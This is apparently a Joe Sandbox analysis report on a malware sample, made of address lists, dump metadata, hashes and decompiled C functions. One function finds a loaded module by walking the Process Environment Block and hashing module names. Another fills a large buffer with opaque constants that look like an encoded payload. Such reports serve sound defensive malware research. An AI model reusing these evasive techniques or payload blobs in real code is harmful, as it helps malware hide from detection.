0x00115754
0x00115754
0x00115757
0x00000000
0x00115759
0x00115759
0x0011575e
0x00115761
0x00115761
0x0011576f
0x0011577a
0x0011577b
0x0011577e
0x00115780
0x00000000
0x00000000
0x00115782
0x00115782
0x00115785
0x00115787
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115787
0x00000000
0x00115761
0x00115743
0x00115743
0x00115743
0x00115746
0x00115748
0x00115789
0x00115789
0x0011578c
0x0011578c
0x0011578f
0x00116211
0x00116211
0x00000000
0x00000000
0x00000000
0x00000000
0x0011574a
0x0011574a
0x0011574a
0x0011574c
0x001157d0
0x001157d0
0x00000000
0x00115752
0x00115752
0x00000000
0x00115752
0x0011574c
0x00115748
0x00000000
0x00115795
0x00115798
0x0011579a
0x0011579c
0x0011579d
0x0011579f
0x001157a2
0x001157a5
0x001157a8
0x001157a8
0x00000000
0x001157ad
0x0011572a
0x00000000
0x00115721
0x001155e8
0x001163a4
0x001163a4
0x001163a4
0x001163a7
0x0011644a
0x0011644a
0x00000000
0x0011644a
0x00115470
0x00115470
0x00115472
0x00115497
0x0011549c
0x001154a1
0x001154a3
0x001154a5
0x001154a8
0x001154ab
0x00000000
0x00115474
0x00000000
0x00115474
0x00115482
0x00115484
0x00115485
0x00115488
0x0011548a
0x0011548d
0x00115490
0x00115495
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00115495
0x0011633c
0x00116422
0x00116422
0x0011642b
0x00116430
0x00116430
0x00116433
0x00116436
0x00116439
0x0011643b
0x0011643b
0x0011643e
0x00116440
0x0011644d
0x0011644d
0x00116450
0x00116452
0x00116454
0x00116454
0x00116454
0x00116457
0x00000000
0x00000000
0x00116459
0x00116459
0x0011645a
0x0011645d
0x0011645f
0x00000000
0x00000000
0x00000000
0x0011645f
0x00116454
0x00116452
0x0011643e
0x00116439
0x00115472
0x00000000
0x00115426
0x00115426
0x0011542b
0x0011542c
0x0011542d
0x00115430
0x00115430
0x00115434
0x00115436
0x0011543c
0x00115444
0x00115444
0x00115448
0x0011544b
0x0011544e
0x00000000
0x0011544e
0x00115404
0x00116461
0x00116461
0x00116464
0x00116466
0x0011646b
0x0011646e
0x00116471
0x00116474
0x00116476
0x00116479
0x00116483
0x0011648e
0x00116491
0x00116495
0x0011649b
0x001164a1
0x001164a7
0x001164aa
0x001164ad
0x001164b2
0x001164b5
0x001164b7
0x001164bd
0x001164bd
0x001164bf
0x001164c5
0x001164c5
0x001164cf
0x001164d5
0x001164de
0x001164e1
0x001164e4
0x001164e6
0x001164ea
0x001164ed
0x001164f3
0x001164f3
0x001164f5
0x001164f5
0x001164f5
0x001164f7
0x001164fa
0x001164fd
0x00116503
0x00116503
0x00116508
0x00116509
0x0011650a
0x0011650b
0x0011650b
0x0011650b
0x00116510
0x00116510
0x00116513
0x00116516
0x00116521
0x0011652c
0x00116537
0x00116542
0x0011654d
0x00116558
0x00116563
0x00116568
0x0011656b
0x0011656d
0x00116572
0x00116574
0x00116574
0x00116579
0x0011657c
0x0011657c
0x0011657f
0x0011657f
0x00116581
0x00116584
0x00116586
0x00116588
0x0011658c
0x0011658f
0x00116591
0x00116591
0x00116596
0x0011659e
0x001165a2
0x001165a2
0x001165a6
0x001165b0
0x001165b0
0x001165b3
0x001165b5
0x001165b9
0x001165bb
0x001165be
0x001165c0
0x001165c2
0x001165c2
0x001165c2
0x001165c5
0x001165c8
0x001165cb
0x001165ce
0x001165d1
0x001165d1
0x001165d4
0x001165d4
0x001165d6
0x001165d8
0x001165de
0x001165e0
0x001165e2
0x001165e2
0x001165e3
0x001165e3
0x001165e6
0x001165e9
0x001165eb
0x001165eb
0x001165eb
0x001165ed
0x001165f2
0x001165fd
0x00116609
0x0011660f
0x00116611
0x00116611
0x00116611
0x00116614
0x00116619
0x0011661c
0x0011661c
0x00116625
0x0011662a
0x0011662a
0x0011662b
0x0011662e
0x00116630
0x00116633
0x00116635
0x00116637
0x0011663b
0x0011663d
0x00116645
0x00116645
0x00116645
0x0011663b
0x00116635
0x001164bf
0x00116648
0x00116650
0x00000000
0x00116650
0x00116347
0x00116347
0x00000000

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd12743edb5e3691a4a3033be4dfcac8ed612c62055bf24d7b1791fbb17b0f9a
Instruction ID: 064c8beb7bc97ef7068d9734a84d3af0e900597455083a87ab939a03846d1828
Opcode Fuzzy Hash: dd12743edb5e3691a4a3033be4dfcac8ed612c62055bf24d7b1791fbb17b0f9a
Instruction Fuzzy Hash: 67126D71E0462ADBCF1DCF69C8902FDBBB2BF98300F25417AD866A7644D7349981DB90

Uniqueness

Uniqueness Score: 0.00%

Function 00111550, Relevance: .0, Instructions: 38
COMMON

C-Code - Quality: 72%

			E00111550(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _t6;
				signed int _t7;
				intOrPtr* _t10;
				signed int _t13;
				intOrPtr* _t16;
				signed short* _t18;

				_push(__ecx);
				_t6 =  *[fs:0x30];
				_t10 =  *((intOrPtr*)(_t6 + 0xc)) + 0xc;
				_v8 = __ecx;
				_t16 =  *_t10;
				if(_t16 == _t10) {
					L9:
					goto 0x31021e;
					asm("int3");
					asm("int3");
					asm("int3");
					return _t6;
				} else {
					do {
						_t18 =  *(_t16 + 0x30);
						_t13 = 0;
						_t6 =  *_t18 & 0x0000ffff;
						while(_t6 != 0) {
							_t4 = _t6 - 0x41; // -17
							_t7 = _t6 & 0x0000ffff;
							if(_t4 <= 0x19) {
								_t7 = _t7 + 0x20;
							}
							_t18 =  &(_t18[1]);
							_t13 = _t13 * 0x1003f + _t7;
							_t6 =  *_t18 & 0x0000ffff;
						}
						if(_t13 == _v8) {
							goto 0x310234;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							return _t6;
						} else {
							goto L8;
						}
						goto L11;
						L8:
						_t16 =  *_t16;
					} while (_t16 != _t10);
					goto L9;
				}
				L11:
			}

0x00111553
0x00111554
0x00111560
0x00111563
0x00111566
0x0011156a
0x001115ad
0x001115ad
0x001115b2
0x001115b3
0x001115b4
0x001115b5
0x00111570
0x00111570
0x00111570
0x00111573
0x00111575
0x0011157b
0x00111580
0x00111583
0x0011158a
0x0011158c
0x0011158c
0x00111595
0x00111598
0x0011159a
0x0011159d
0x001115a5
0x001115b6
0x001115bb
0x001115bc
0x001115bd
0x001115be
0x001115bf
0x00000000
0x00000000
0x00000000
0x00000000
0x001115a7
0x001115a7
0x001115a9
0x00000000
0x00111570
0x00000000

Memory Dump Source

Source File: 00000007.00000002.1686867602.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000007.00000002.1686863545.00110000.00000004.sdmp Download File
Associated: 00000007.00000002.1686872902.00121000.00000002.sdmp Download File
Associated: 00000007.00000002.1686882552.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_110000_810.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56eba42e76fd391cf054b91ae9251c87cc7831105178012301f830c567abc3d2
Instruction ID: fed1bc987eac0487189eefdc72caa15c99878de4f511f1aef99a9027f4e58ff1
Opcode Fuzzy Hash: 56eba42e76fd391cf054b91ae9251c87cc7831105178012301f830c567abc3d2
Instruction Fuzzy Hash: 10F0A472900115ABCB68DF06C9816F9F3ABFFD97847994069EA465B200EB34ADC1C660

Uniqueness

Uniqueness Score: 0.00%

Function 0011717A, Relevance: 39.0, APIs: 3, Strings: 19, Instructions: 467
memorylibraryUNIQUE

C-Code - Quality: 97%

			E0011717A(void* __esi, void* __eflags) {
				int _t452;
				void* _t454;
				intOrPtr _t456;
				void* _t459;
				void* _t461;
				void* _t462;
				void* _t463;

				 *((intOrPtr*)(_t463 - 0x6fc)) = 0xda13a380;
				 *((intOrPtr*)(_t463 - 0x6f8)) = 0x4a2d724d;
				 *((intOrPtr*)(_t463 - 0x6f4)) = 0xbbbef731;
				 *((intOrPtr*)(_t463 - 0x6f0)) = 0x335bc7e2;
				 *((intOrPtr*)(_t463 - 0x6ec)) = 0xfe1b3ebb;
				 *((intOrPtr*)(_t463 - 0x6e8)) = 0x1517088;
				 *((intOrPtr*)(_t463 - 0x6e4)) = 0xc306eafb;
				 *((intOrPtr*)(_t463 - 0x6e0)) = 0xe7eb6c1f;
				 *((intOrPtr*)(_t463 - 0x6dc)) = 0x38670867;
				 *((intOrPtr*)(_t463 - 0x6d8)) = 0xcd989c2d;
				 *((intOrPtr*)(_t463 - 0x6d4)) = 0x22f5ead6;
				 *((intOrPtr*)(_t463 - 0x6d0)) = 0xf84e10bf;
				 *((intOrPtr*)(_t463 - 0x6cc)) = 0xdc8796e2;
				 *((intOrPtr*)(_t463 - 0x6c8)) = 0x369fd1c8;
				 *((intOrPtr*)(_t463 - 0x6c4)) = 0x2b6014cc;
				 *((intOrPtr*)(_t463 - 0x6c0)) = 0x37772353;
				 *((intOrPtr*)(_t463 - 0x6bc)) = 0x1fdd8645;
				 *((intOrPtr*)(_t463 - 0x6b8)) = 0x9296362b;
				 *((intOrPtr*)(_t463 - 0x6b4)) = 0x1e1487d7;
				 *((intOrPtr*)(_t463 - 0x6b0)) = 0xcc9a4641;
				 *((intOrPtr*)(_t463 - 0x6ac)) = 0xe415f087;
				 *((intOrPtr*)(_t463 - 0x6a8)) = 0x62ae3378;
				 *((intOrPtr*)(_t463 - 0x6a4)) = 0x10a872c0;
				 *((intOrPtr*)(_t463 - 0x6a0)) = 0x2f5a0b3e;
				 *((intOrPtr*)(_t463 - 0x69c)) = 0xec070bd9;
				 *((intOrPtr*)(_t463 - 0x698)) = 0x554b37ff;
				 *((intOrPtr*)(_t463 - 0x694)) = 0x3214b6e6;
				 *((intOrPtr*)(_t463 - 0x690)) = 0x1c6154ae;
				 *((intOrPtr*)(_t463 - 0x68c)) = 0x859bc5de;
				 *((intOrPtr*)(_t463 - 0x688)) = 0x7ee4a1a6;
				 *((intOrPtr*)(_t463 - 0x684)) = 0x28946554;
				 *((intOrPtr*)(_t463 - 0x680)) = 0x4d3d51f;
				 *((intOrPtr*)(_t463 - 0x67c)) = 0x8ccb73df;
				 *((intOrPtr*)(_t463 - 0x678)) = 0x3dbead2;
				 *((intOrPtr*)(_t463 - 0x674)) = 0x299093ec;
				 *((intOrPtr*)(_t463 - 0x670)) = 0x912d9436;
				 *((intOrPtr*)(_t463 - 0x66c)) = 0xbe49d910;
				 *((intOrPtr*)(_t463 - 0x668)) = 0x27a738a5;
				 *((intOrPtr*)(_t463 - 0x664)) = 0x8907b220;
				 *((intOrPtr*)(_t463 - 0x660)) = 0xc8ed5966;
				 *((intOrPtr*)(_t463 - 0x65c)) = 0xdc3fcee6;
				 *((intOrPtr*)(_t463 - 0x658)) = 0x9e10caf6;
				 *((intOrPtr*)(_t463 - 0x654)) = 0x4453d80;
				 *((intOrPtr*)(_t463 - 0x650)) = 0x226e4280;
				 *((intOrPtr*)(_t463 - 0x64c)) = 0xc6aced26;
				 *((intOrPtr*)(_t463 - 0x648)) = 0xa539b9b;
				 *((intOrPtr*)(_t463 - 0x644)) = 0xd276a9b5;
				 *((intOrPtr*)(_t463 - 0x640)) = 0x34d76a8d;
				 *((intOrPtr*)(_t463 - 0x63c)) = 0xf3f37ec1;
				 *((intOrPtr*)(_t463 - 0x638)) = 0xc3074508;
				 *((intOrPtr*)(_t463 - 0x634)) = 0x8e2cbf38;
				 *((intOrPtr*)(_t463 - 0x630)) = 0x5335e85f;
				 *((intOrPtr*)(_t463 - 0x62c)) = 0x1636db53;
				 *((intOrPtr*)(_t463 - 0x628)) = 0xf5fca815;
				 *((intOrPtr*)(_t463 - 0x624)) = 0xb4447e5c;
				 *((intOrPtr*)(_t463 - 0x620)) = 0xc360be71;
				 *((intOrPtr*)(_t463 - 0x61c)) = 0x5b604abd;
				 *((intOrPtr*)(_t463 - 0x618)) = 0x9d64890;
				 *((intOrPtr*)(_t463 - 0x614)) = 0xa490b32e;
				 *((intOrPtr*)(_t463 - 0x610)) = 0xabed6f87;
				 *((intOrPtr*)(_t463 - 0x60c)) = 0x67fc4fe0;
				 *((intOrPtr*)(_t463 - 0x608)) = 0xe983bc6a;
				 *((intOrPtr*)(_t463 - 0x604)) = 0x7b8ea4e6;
				 *((intOrPtr*)(_t463 - 0x600)) = 0x553e608a;
				 *((intOrPtr*)(_t463 - 0x5fc)) = 0x40451882;
				 *((intOrPtr*)(_t463 - 0x5f8)) = 0x870018c2;
				 *((intOrPtr*)(_t463 - 0x5f4)) = 0x5dd1138d;
				 *((intOrPtr*)(_t463 - 0x5f0)) = 0x854db42f;
				 *((intOrPtr*)(_t463 - 0x5ec)) = 0xdca42c0c;
				 *((intOrPtr*)(_t463 - 0x5e8)) = 0xd96f55d7;
				 *((intOrPtr*)(_t463 - 0x5e4)) = 0xf57dccd;
				 *((intOrPtr*)(_t463 - 0x5e0)) = 0x70dfccd0;
				 *((intOrPtr*)(_t463 - 0x5dc)) = 0xfb1196b8;
				 *((intOrPtr*)(_t463 - 0x5d8)) = 0x4e6cd616;
				 *((intOrPtr*)(_t463 - 0x5d4)) = 0xe5ce3506;
				 *((intOrPtr*)(_t463 - 0x5d0)) = 0x62ce63b;
				 *((intOrPtr*)(_t463 - 0x5cc)) = 0x9c78bdb5;
				 *((intOrPtr*)(_t463 - 0x5c8)) = 0x56222b50;
				 *((intOrPtr*)(_t463 - 0x5c4)) = 0x8f638c3a;
				 *((intOrPtr*)(_t463 - 0x5c0)) = 0x7f6fd8ad;
				 *((intOrPtr*)(_t463 - 0x5bc)) = 0x8307f23b;
				 *((intOrPtr*)(_t463 - 0x5b8)) = 0x330ec9fb;
				 *((intOrPtr*)(_t463 - 0x5b4)) = 0x128d0a18;
				 *((intOrPtr*)(_t463 - 0x5b0)) = 0xf2853133;
				 *((intOrPtr*)(_t463 - 0x5ac)) = 0xb28e8662;
				 *((intOrPtr*)(_t463 - 0x5a8)) = 0xcc6041b;
				 *((intOrPtr*)(_t463 - 0x5a4)) = 0x503860ba;
				 *((intOrPtr*)(_t463 - 0x5a0)) = 0xaf848ab6;
				 *((intOrPtr*)(_t463 - 0x59c)) = 0xc7f7d317;
				 *((intOrPtr*)(_t463 - 0x598)) = 0x13073c8b;
				 *((intOrPtr*)(_t463 - 0x594)) = 0x9052bc99;
				 *((intOrPtr*)(_t463 - 0x590)) = 0x877c99df;
				 *((intOrPtr*)(_t463 - 0x58c)) = 0x6c99bb22;
				 *((intOrPtr*)(_t463 - 0x588)) = 0x58ef0440;
				 *((intOrPtr*)(_t463 - 0x584)) = 0x34bf58b3;
				 *((intOrPtr*)(_t463 - 0x580)) = 0x5993081f;
				 *((intOrPtr*)(_t463 - 0x57c)) = 0x515bdc21;
				 *((intOrPtr*)(_t463 - 0x578)) = 0x787835c3;
				 *((intOrPtr*)(_t463 - 0x574)) = 0x87ae10eb;
				 *((intOrPtr*)(_t463 - 0x570)) = 0x32d4b469;
				 *((intOrPtr*)(_t463 - 0x56c)) = 0x661ffa4d;
				 *((intOrPtr*)(_t463 - 0x568)) = 0x98cd5178;
				 *((intOrPtr*)(_t463 - 0x564)) = 0xe5a99966;
				 *((intOrPtr*)(_t463 - 0x560)) = 0x30cc96f5;
				 *((intOrPtr*)(_t463 - 0x55c)) = 0x4bda7984;
				 *((intOrPtr*)(_t463 - 0x558)) = 0x7c3f202c;
				 *((intOrPtr*)(_t463 - 0x554)) = 0xc9dc119f;
				 *((intOrPtr*)(_t463 - 0x550)) = 0x303f7fb7;
				 *((intOrPtr*)(_t463 - 0x54c)) = 0x2f3e966e;
				 *((intOrPtr*)(_t463 - 0x548)) = 0xbe38574d;
				 *((intOrPtr*)(_t463 - 0x544)) = 0xfdd53dc6;
				 *((intOrPtr*)(_t463 - 0x540)) = 0x6159b14a;
				 *((intOrPtr*)(_t463 - 0x53c)) = 0xab550c22;
				 *((intOrPtr*)(_t463 - 0x538)) = 0x7546765d;
				 *((intOrPtr*)(_t463 - 0x534)) = 0x9db4a3a8;
				 *((intOrPtr*)(_t463 - 0x530)) = 0x8febdd9d;
				 *((intOrPtr*)(_t463 - 0x52c)) = 0x942a1da5;
				 *((intOrPtr*)(_t463 - 0x528)) = 0x8ce7803f;
				 *((intOrPtr*)(_t463 - 0x524)) = 0x8f979a1a;
				 *((intOrPtr*)(_t463 - 0x520)) = 0x4973ed66;
				 *((intOrPtr*)(_t463 - 0x51c)) = 0xf026f445;
				 *((intOrPtr*)(_t463 - 0x518)) = 0x879c0fd7;
				 *((intOrPtr*)(_t463 - 0x514)) = 0x6b636af;
				 *((intOrPtr*)(_t463 - 0x510)) = 0xfc789df7;
				 *((intOrPtr*)(_t463 - 0x50c)) = 0xe9302e0f;
				 *((intOrPtr*)(_t463 - 0x508)) = 0x6bf7e741;
				 *((intOrPtr*)(_t463 - 0x504)) = 0x98954128;
				 *((intOrPtr*)(_t463 - 0x500)) = 0x7763bde3;
				 *((intOrPtr*)(_t463 - 0x4fc)) = 0xb1f3814;
				 *((intOrPtr*)(_t463 - 0x4f8)) = 0x9f3a0dd8;
				 *((intOrPtr*)(_t463 - 0x4f4)) = 0x8eb0c0cb;
				 *((intOrPtr*)(_t463 - 0x4f0)) = 0xe5f73fe6;
				 *((intOrPtr*)(_t463 - 0x4ec)) = 0xb1e43bd0;
				 *((intOrPtr*)(_t463 - 0x4e8)) = 0x771b000e;
				 *((intOrPtr*)(_t463 - 0x4e4)) = 0xcd3fef67;
				 *((intOrPtr*)(_t463 - 0x4e0)) = 0x92be2bdc;
				 *((intOrPtr*)(_t463 - 0x4dc)) = 0xa68fa81;
				 *((intOrPtr*)(_t463 - 0x4d8)) = 0x9dad74b3;
				 *((intOrPtr*)(_t463 - 0x4d4)) = 0xc44aa636;
				 *((intOrPtr*)(_t463 - 0x4d0)) = 0xe3c10673;
				 *((intOrPtr*)(_t463 - 0x4cc)) = 0x5937842a;
				 *((intOrPtr*)(_t463 - 0x4c8)) = 0x194c927d;
				 *((intOrPtr*)(_t463 - 0x4c4)) = 0x68ba32e5;
				 *((intOrPtr*)(_t463 - 0x4c0)) = 0x9d9ca700;
				 *((intOrPtr*)(_t463 - 0x4bc)) = 0xe42720fb;
				 *((intOrPtr*)(_t463 - 0x4b8)) = 0x97bf4093;
				 *((intOrPtr*)(_t463 - 0x4b4)) = 0xe480a8ff;
				 *((intOrPtr*)(_t463 - 0x4b0)) = 0xade1974;
				 *((intOrPtr*)(_t463 - 0x4ac)) = 0xe9af4224;
				 *((intOrPtr*)(_t463 - 0x4a8)) = 0x96d703c2;
				 *((intOrPtr*)(_t463 - 0x4a4)) = 0xe04a501d;
				 *((intOrPtr*)(_t463 - 0x4a0)) = 0x1e77706d;
				 *((intOrPtr*)(_t463 - 0x49c)) = 0xb7f78974;
				 *((intOrPtr*)(_t463 - 0x498)) = 0x76fc7a7a;
				 *((intOrPtr*)(_t463 - 0x494)) = 0xeab1e862;
				 *((intOrPtr*)(_t463 - 0x490)) = 0xc448d29a;
				 *((intOrPtr*)(_t463 - 0x48c)) = 0xcfdfd93a;
				 *((intOrPtr*)(_t463 - 0x488)) = 0xc00b719e;
				 *((intOrPtr*)(_t463 - 0x484)) = 0x5c421644;
				 *((intOrPtr*)(_t463 - 0x480)) = 0xef8a9d35;
				 *((intOrPtr*)(_t463 - 0x47c)) = 0xc2f9cdbf;
				 *((intOrPtr*)(_t463 - 0x478)) = 0xd75ab0e4;
				 *((intOrPtr*)(_t463 - 0x474)) = 0xd4fd446f;
				 *((intOrPtr*)(_t463 - 0x470)) = 0x6c0d7af9;
				 *((intOrPtr*)(_t463 - 0x46c)) = 0x2423c84f;
				 *((intOrPtr*)(_t463 - 0x468)) = 0xd6fd3e2b;
				 *((intOrPtr*)(_t463 - 0x464)) = 0x65814f77;
				 *((intOrPtr*)(_t463 - 0x460)) = 0x1075fea8;
				 *((intOrPtr*)(_t463 - 0x45c)) = 0xdc9dee07;
				 *((intOrPtr*)(_t463 - 0x458)) = 0x3bbee7e7;
				 *((intOrPtr*)(_t463 - 0x454)) = 0xf7a6cff8;
				 *((intOrPtr*)(_t463 - 0x450)) = 0xc5e08db9;
				 *((intOrPtr*)(_t463 - 0x44c)) = 0x8e09787f;
				 *((intOrPtr*)(_t463 - 0x448)) = 0x75053736;
				 *((intOrPtr*)(_t463 - 0x444)) = 0x3746f159;
				 *((intOrPtr*)(_t463 - 0x440)) = 0x81da0dce;
				 *((intOrPtr*)(_t463 - 0x43c)) = 0x8a31c1eb;
				 *((intOrPtr*)(_t463 - 0x438)) = 0x42ec62d3;
				 *((intOrPtr*)(_t463 - 0x434)) = 0x1ffe42cb;
				 *((intOrPtr*)(_t463 - 0x430)) = 0x7d8d2ccb;
				 *((intOrPtr*)(_t463 - 0x42c)) = 0xbe5a5ea0;
				 *((intOrPtr*)(_t463 - 0x428)) = 0x6a48c00;
				 *((intOrPtr*)(_t463 - 0x424)) = 0xb9ed38e0;
				 *((intOrPtr*)(_t463 - 0x420)) = 0xbd2dc679;
				 *((intOrPtr*)(_t463 - 0x41c)) = 0x39aa03f5;
				 *((intOrPtr*)(_t463 - 0x418)) = 0xd7ee1a12;
				 *((intOrPtr*)(_t463 - 0x414)) = 0xfbea6635;
				 *((intOrPtr*)(_t463 - 0x410)) = 0x89b73866;
				 *((intOrPtr*)(_t463 - 0x40c)) = 0xe12bc354;
				 *((intOrPtr*)(_t463 - 0x408)) = 0x81996796;
				 *((intOrPtr*)(_t463 - 0x404)) = 0x7a4d18fa;
				 *((intOrPtr*)(_t463 - 0x400)) = 0xa06479c8;
				 *((intOrPtr*)(_t463 - 0x3fc)) = 0xb2b87b6c;
				 *((intOrPtr*)(_t463 - 0x3f8)) = 0x960cae1e;
				 *((intOrPtr*)(_t463 - 0x3f4)) = 0x92721397;
				 *((intOrPtr*)(_t463 - 0x3f0)) = 0x855794d2;
				 *((intOrPtr*)(_t463 - 0x3ec)) = 0x6e2783f0;
				 *((intOrPtr*)(_t463 - 0x3e8)) = 0x2990bcc4;
				 *((intOrPtr*)(_t463 - 0x3e4)) = 0xa275d0b2;
				 *((intOrPtr*)(_t463 - 0x3e0)) = 0x38acfc38;
				 *((intOrPtr*)(_t463 - 0x3dc)) = 0x7e4b475a;
				 *((intOrPtr*)(_t463 - 0x3d8)) = 0xcc650a45;
				 *((intOrPtr*)(_t463 - 0x3d4)) = 0x46ee7d90;
				 *((intOrPtr*)(_t463 - 0x3d0)) = 0x52db6a12;
				 *((intOrPtr*)(_t463 - 0x3cc)) = 0xcb5cc8b3;
				 *((intOrPtr*)(_t463 - 0x3c8)) = 0x8d274237;
				 *((intOrPtr*)(_t463 - 0x3c4)) = 0x2db6abbb;
				 *((intOrPtr*)(_t463 - 0x3c0)) = 0x73173549;
				 *((intOrPtr*)(_t463 - 0x3bc)) = 0xa3bc4232;
				 *((intOrPtr*)(_t463 - 0x3b8)) = 0xd9cd433c;
				 *((intOrPtr*)(_t463 - 0x3b4)) = 0x3831378e;
				 *((intOrPtr*)(_t463 - 0x3b0)) = 0x15d26c3d;
				 *((intOrPtr*)(_t463 - 0x3ac)) = 0x44991ce8;
				 *((intOrPtr*)(_t463 - 0x3a8)) = 0x1a59124e;
				 *((intOrPtr*)(_t463 - 0x3a4)) = 0x263f8333;
				 *((intOrPtr*)(_t463 - 0x3a0)) = 0xccd93843;
				 *((intOrPtr*)(_t463 - 0x39c)) = 0x254056e4;
				 *((intOrPtr*)(_t463 - 0x398)) = 0x11a185;
				 *((intOrPtr*)(_t463 - 0x394)) = 0x423c572c;
				 *((intOrPtr*)(_t463 - 0x390)) = 0x4d0fadf5;
				 *((intOrPtr*)(_t463 - 0x38c)) = 0xb32a5f7d;
				 *((intOrPtr*)(_t463 - 0x388)) = 0xbdf26336;
				 *((intOrPtr*)(_t463 - 0x384)) = 0xdc9b118e;
				 *((intOrPtr*)(_t463 - 0x380)) = 0xabfa5a90;
				 *((intOrPtr*)(_t463 - 0x37c)) = 0x512d3105;
				 *((intOrPtr*)(_t463 - 0x378)) = 0x3a65580d;
				 *((intOrPtr*)(_t463 - 0x374)) = 0x964bedc9;
				 *((intOrPtr*)(_t463 - 0x370)) = 0x2856c777;
				 *((intOrPtr*)(_t463 - 0x36c)) = 0x8390ded5;
				 *((intOrPtr*)(_t463 - 0x368)) = 0xf9ed8b2;
				 *((intOrPtr*)(_t463 - 0x364)) = 0xd01694f2;
				 *((intOrPtr*)(_t463 - 0x360)) = 0x87c295b3;
				 *((intOrPtr*)(_t463 - 0x35c)) = 0x49c46db9;
				 *((intOrPtr*)(_t463 - 0x358)) = 0x1dd48e6e;
				 *((intOrPtr*)(_t463 - 0x354)) = 0x2e721092;
				 *((intOrPtr*)(_t463 - 0x350)) = 0xe52ecf7a;
				 *((intOrPtr*)(_t463 - 0x34c)) = 0x17cdda0e;
				 *((intOrPtr*)(_t463 - 0x348)) = 0x3c53b6fe;
				 *((intOrPtr*)(_t463 - 0x344)) = 0x8f48d565;
				 *((intOrPtr*)(_t463 - 0x340)) = 0x43993e39;
				 *((intOrPtr*)(_t463 - 0x33c)) = 0xed09bdf2;
				 *((intOrPtr*)(_t463 - 0x338)) = 0x5961145a;
				 *((intOrPtr*)(_t463 - 0x334)) = 0x8526533d;
				 *((intOrPtr*)(_t463 - 0x330)) = 0x5ef91ba8;
				 *((intOrPtr*)(_t463 - 0x32c)) = 0x37d2b4a0;
				 *((intOrPtr*)(_t463 - 0x328)) = 0x58989eca;
				 *((intOrPtr*)(_t463 - 0x324)) = 0x27e39b75;
				 *((intOrPtr*)(_t463 - 0x320)) = 0x4920552a;
				 *((intOrPtr*)(_t463 - 0x31c)) = 0xa51805b7;
				 *((intOrPtr*)(_t463 - 0x318)) = 0x5f77e1a5;
				 *((intOrPtr*)(_t463 - 0x314)) = 0x410ccda1;
				 *((intOrPtr*)(_t463 - 0x310)) = 0x379f9fab;
				 *((intOrPtr*)(_t463 - 0x30c)) = 0x710f10e1;
				 *((intOrPtr*)(_t463 - 0x308)) = 0xb6b377ac;
				 *((intOrPtr*)(_t463 - 0x304)) = 0xead8e01d;
				 *((intOrPtr*)(_t463 - 0x300)) = 0x6a300eb6;
				 *((intOrPtr*)(_t463 - 0x2fc)) = 0xac9f4aef;
				 *((intOrPtr*)(_t463 - 0x2f8)) = 0x94963b8;
				 *((intOrPtr*)(_t463 - 0x2f4)) = 0x2ef621cb;
				 *((intOrPtr*)(_t463 - 0x2f0)) = 0x2a7e912c;
				 *((intOrPtr*)(_t463 - 0x2ec)) = 0x8b888c91;
				 *((intOrPtr*)(_t463 - 0x2e8)) = 0x10c13f0e;
				 *((intOrPtr*)(_t463 - 0x2e4)) = 0x941a2f31;
				 *((intOrPtr*)(_t463 - 0x2e0)) = 0x36c6129f;
				 *((intOrPtr*)(_t463 - 0x2dc)) = 0xe4c725f;
				 *((intOrPtr*)(_t463 - 0x2d8)) = 0x93c307ef;
				 *((intOrPtr*)(_t463 - 0x2d4)) = 0xf47416f5;
				 *((intOrPtr*)(_t463 - 0x2d0)) = 0x220e9ff0;
				 *((intOrPtr*)(_t463 - 0x2cc)) = 0xd7051b24;
				 *((intOrPtr*)(_t463 - 0x2c8)) = 0x8f2fd263;
				 *((intOrPtr*)(_t463 - 0x2c4)) = 0x42bb64f7;
				 *((intOrPtr*)(_t463 - 0x2c0)) = 0xf2f5df1e;
				 *((intOrPtr*)(_t463 - 0x2bc)) = 0xe5fcf499;
				 *((intOrPtr*)(_t463 - 0x2b8)) = 0x86e73;
				 *((intOrPtr*)(_t463 - 0x2b4)) = 0x917adac0;
				 *((intOrPtr*)(_t463 - 0x2b0)) = 0x82542f5;
				 *((intOrPtr*)(_t463 - 0x2ac)) = 0x7169b7c0;
				 *((intOrPtr*)(_t463 - 0x2a8)) = 0x55e8de5d;
				 *((intOrPtr*)(_t463 - 0x2a4)) = 0xc98de486;
				 *((intOrPtr*)(_t463 - 0x2a0)) = 0xa5f9dee8;
				 *((intOrPtr*)(_t463 - 0x29c)) = 0xae4f25d;
				 *((intOrPtr*)(_t463 - 0x298)) = 0x89c4da91;
				 *((intOrPtr*)(_t463 - 0x294)) = 0xd9280baf;
				 *((intOrPtr*)(_t463 - 0x290)) = 0x7efcb77b;
				 *((intOrPtr*)(_t463 - 0x28c)) = 0x8c5129e7;
				 *((intOrPtr*)(_t463 - 0x288)) = 0xee2a51d4;
				 *((intOrPtr*)(_t463 - 0x284)) = 0xae4a5ea0;
				 *((intOrPtr*)(_t463 - 0x280)) = 0xc3b14c11;
				 *((intOrPtr*)(_t463 - 0x27c)) = 0x8839fd47;
				 *((intOrPtr*)(_t463 - 0x278)) = 0xbee9fc8a;
				 *((intOrPtr*)(_t463 - 0x274)) = 0xcc2c1586;
				 *((intOrPtr*)(_t463 - 0x270)) = 0xd020ad33;
				 *((intOrPtr*)(_t463 - 0x26c)) = 0x9010167f;
				 *((intOrPtr*)(_t463 - 0x268)) = 0x9ff2789b;
				 *((intOrPtr*)(_t463 - 0x264)) = 0xb5ee5a36;
				 *((intOrPtr*)(_t463 - 0x260)) = 0x8025f2ba;
				 *((intOrPtr*)(_t463 - 0x25c)) = 0xf3c300eb;
				 *((intOrPtr*)(_t463 - 0x258)) = 0x5d0d2b8a;
				 *((intOrPtr*)(_t463 - 0x254)) = 0x6f09a1e9;
				 *((intOrPtr*)(_t463 - 0x250)) = 0xda430b01;
